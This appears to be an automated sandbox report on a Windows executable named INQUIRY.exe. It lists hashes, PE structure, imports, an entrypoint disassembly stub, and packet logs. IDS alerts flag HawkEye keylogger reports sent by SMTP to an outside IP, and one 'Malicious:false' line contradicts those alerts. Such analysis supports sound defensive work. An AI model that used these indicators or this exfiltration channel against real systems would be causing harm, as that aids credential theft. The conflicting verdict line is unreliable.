                                                                      SHA-256:25E8C1425C844373EBE82F274167A8ADEA6581F5A4F3ABC6B5F4BD0E5AE80092
                                                                      SHA-512:514421997E148C08C2BEE3664F660BEAA500881D1683F2DC6680DA7B5038857A941691871129564402768970E4463883C17A3CB186B1CCB0DE82714633B7EECF
                                                                      Malicious:false
                                                                      Preview: C:\Users\user\Desktop\INQUIRY.exe

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):6.893502354967658
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.66%
                                                                      • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                      • Windows Screen Saver (13104/52) 0.13%
                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      File name:INQUIRY.exe
                                                                      File size:1009664
                                                                      MD5:0b940145d7d02e5b1b975c99dd5197a4
                                                                      SHA1:53ae0b576f7b362b90a25ace1470d33068db4490
                                                                      SHA256:bf487ff7cdbbd998b633b1858a939d8c808bcce65ab9937695475b39deea70a8
                                                                      SHA512:f6ea131ca86752edd8163c27ba045ff8ab4fe90a92f923565496e99d8b46ba5e99af14660bcca127a1ff06246ca262456508f6f9de2462e4cd10ba53d1428a92
                                                                      SSDEEP:12288:Hl1aMljBMKnw6WJoGPb5FUoRAVyImHlawG0h/XWl2l+klp8OdH+0YxEGIN1QpZrj:jJCKxWfPNFwyIUlawt/3mwe0dn1QT
                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                      File Icon

                                                                      Icon Hash:60c8d86cece67c70

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x479884
                                                                      Entrypoint Section:CODE
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                      DLL Characteristics:
                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:5113dec31b8616dbad783836e7188783

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      add esp, FFFFFFF0h
                                                                      mov eax, 00479694h
                                                                      call 00007F14C893661Dh
                                                                      mov eax, dword ptr [00495AD0h]
                                                                      mov eax, dword ptr [eax]
                                                                      call 00007F14C89863DDh
                                                                      mov ecx, dword ptr [00495BC8h]
                                                                      mov eax, dword ptr [00495AD0h]
                                                                      mov eax, dword ptr [eax]
                                                                      mov edx, dword ptr [00479188h]
                                                                      call 00007F14C89863DDh
                                                                      mov eax, dword ptr [00495AD0h]
                                                                      mov eax, dword ptr [eax]
                                                                      call 00007F14C8986451h
                                                                      call 00007F14C8934114h
                                                                      lea eax, dword ptr [eax+00h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x970000x24c4.idata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xa40000x57324.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x9c0000x7f70.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x9b0000x18.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      CODE0x10000x788cc0x78a00False0.524172198834data6.51448811653IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      DATA0x7a0000x1bc5c0x1be00False0.171568455717data2.71109267168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      BSS0x960000xcb10x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .idata0x970000x24c40x2600False0.352076480263data4.94171972073IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .tls0x9a0000x100x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x9b0000x180x200False0.048828125data0.20058190744IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                      .reloc0x9c0000x7f700x8000False0.559631347656data6.62495186635IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                      .rsrc0xa40000x573240x57400False0.922672479405data7.57976248647IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_CURSOR0xa49000x134data
                                                                      RT_CURSOR0xa4a340x134data
                                                                      RT_CURSOR0xa4b680x134data
                                                                      RT_CURSOR0xa4c9c0x134data
                                                                      RT_CURSOR0xa4dd00x134data
                                                                      RT_CURSOR0xa4f040x134data
                                                                      RT_CURSOR0xa50380x134data
                                                                      RT_BITMAP0xa516c0x1d0data
                                                                      RT_BITMAP0xa533c0x1e4data
                                                                      RT_BITMAP0xa55200x1d0data
                                                                      RT_BITMAP0xa56f00x1d0data
                                                                      RT_BITMAP0xa58c00x1d0data
                                                                      RT_BITMAP0xa5a900x1d0data
                                                                      RT_BITMAP0xa5c600x1d0data
                                                                      RT_BITMAP0xa5e300x1d0data
                                                                      RT_BITMAP0xa60000x539f1dataEnglishUnited States
                                                                      RT_BITMAP0xf99f40x1d0data
                                                                      RT_BITMAP0xf9bc40xd8data
                                                                      RT_BITMAP0xf9c9c0xd8data
                                                                      RT_BITMAP0xf9d740xd8data
                                                                      RT_BITMAP0xf9e4c0xd8data
                                                                      RT_BITMAP0xf9f240xd8data
                                                                      RT_BITMAP0xf9ffc0xe8GLS_BINARY_LSB_FIRST
                                                                      RT_ICON0xfa0e40x668dataEnglishUnited States
                                                                      RT_DIALOG0xfa74c0x52data
                                                                      RT_RCDATA0xfa7a00x10data
                                                                      RT_RCDATA0xfa7b00x274data
                                                                      RT_RCDATA0xfaa240x7c3Delphi compiled form 'TForm1'
                                                                      RT_GROUP_CURSOR0xfb1e80x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0xfb1fc0x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0xfb2100x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0xfb2240x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0xfb2380x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0xfb24c0x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0xfb2600x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_ICON0xfb2740x14dataEnglishUnited States
                                                                      RT_HTML0xfb2880x99dataEnglishUnited States

                                                                      Imports

                                                                      DLLImport
                                                                      kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                      user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                      oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                      kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                      kernel32.dlllstrcpyA, lstrcmpA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtectEx, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemTime, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                      version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                      gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWindowExtEx, SetWinMetaFileBits, SetViewportOrgEx, SetViewportExtEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PolyPolyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExtTextOutA, ExtCreatePen, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                      user32.dllWindowFromPoint, WinHelpA, WaitMessage, ValidateRect, UpdateWindow, UnregisterClassA, UnionRect, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetMenuItemInfoA, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, IsCharAlphaNumericA, IsCharAlphaA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardType, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCaretPos, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EndPaint, EndDeferWindowPos, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DeferWindowPos, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreateWindowExA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, BeginDeferWindowPos, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                      kernel32.dllSleep
                                                                      oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayRedim, SafeArrayCreate, VariantChangeTypeEx, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                      comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                      kernel32.dllMulDiv

                                                                      Possible Origin

                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishUnited States

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      11/18/20-15:02:26.704911TCP2019926ET TROJAN HawkEye Keylogger Report SMTP49750587192.168.2.4166.62.27.57
                                                                      11/18/20-15:03:08.289546TCP2019926ET TROJAN HawkEye Keylogger Report SMTP49774587192.168.2.4166.62.27.57

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 18, 2020 15:01:59.031246901 CET4974380192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.047661066 CET8049743104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.047848940 CET4974380192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.048484087 CET4974380192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.064749956 CET8049743104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.071091890 CET8049743104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.108748913 CET49744443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.117561102 CET4974380192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.125319004 CET44349744104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.126780987 CET49744443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.169167995 CET49744443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.185825109 CET44349744104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.185980082 CET44349744104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.186119080 CET44349744104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.186583042 CET49744443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.197808981 CET49744443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.199700117 CET49745443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.214375019 CET44349744104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.216025114 CET44349745104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.216219902 CET49745443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.216970921 CET49745443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.233329058 CET44349745104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.235097885 CET44349745104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.235296011 CET44349745104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.235400915 CET49745443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.236514091 CET49745443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.252928972 CET44349745104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:23.817213058 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:24.098351955 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:24.098483086 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:24.647198915 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:24.822807074 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:24.825001001 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:25.106144905 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:25.106544971 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:25.388585091 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:25.388873100 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:25.710129023 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:25.858115911 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:25.858395100 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.139451027 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:26.139874935 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.422636032 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:26.422939062 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.703771114 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:26.703959942 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:26.704910994 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.704945087 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.705151081 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.705218077 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.705363989 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.705427885 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.986233950 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:26.986258984 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:26.999335051 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:27.002060890 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:27.057396889 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:33.383512020 CET4974380192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:33.383887053 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:38.505419016 CET4975980192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.521910906 CET8049759104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.522161961 CET4975980192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.523021936 CET4975980192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.539441109 CET8049759104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.549550056 CET8049759104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.597470045 CET49761443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.613935947 CET44349761104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.614130020 CET49761443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.673311949 CET49761443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.689773083 CET44349761104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.690314054 CET44349761104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.690376043 CET44349761104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.690885067 CET49761443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.693752050 CET49761443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.695373058 CET49763443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.710299015 CET44349761104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.711641073 CET44349763104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.711795092 CET49763443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.712759972 CET49763443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.714680910 CET4975980192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.729115963 CET44349763104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.729497910 CET44349763104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.729578018 CET44349763104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.729635954 CET49763443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.731683016 CET49763443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.747950077 CET44349763104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:03:05.906356096 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:06.168962955 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:06.169061899 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:06.695435047 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:06.695717096 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:06.958623886 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:06.959141970 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:07.222193003 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:07.223017931 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:07.495678902 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:07.495965004 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:07.758713007 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:07.758955002 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:08.022917032 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:08.025825977 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:08.288552999 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:08.288832903 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:08.289546013 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:08.289690971 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:08.289805889 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:08.289907932 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:08.290030956 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:08.290122032 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:08.552166939 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:08.560384035 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:08.561577082 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:08.570868969 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:08.623398066 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:13.975604057 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:13.976175070 CET4975980192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:03:21.336723089 CET4977680192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:03:21.353452921 CET8049776104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:03:21.353768110 CET4977680192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:03:21.354469061 CET4977680192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:03:21.370951891 CET8049776104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:03:21.376317978 CET8049776104.16.154.36192.168.2.4
